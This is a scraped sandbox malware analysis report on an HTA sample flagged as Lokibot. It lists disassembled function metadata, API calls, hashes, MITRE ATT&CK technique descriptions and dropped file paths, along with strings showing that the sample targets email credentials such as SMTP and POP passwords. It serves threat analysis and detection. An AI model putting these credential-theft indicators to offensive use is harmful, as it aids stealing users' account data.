Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
PopServer, xrefs: 0040D099
SmtpPassword, xrefs: 0040D117
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
Technology, xrefs: 0040D08D

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESF0FC.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t23us1s.dbv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dzvmsfy.4nk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4psscq2w.sz3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b34mov4b.25m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2rinent.q0v.ps1

Windows Analysis Report
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

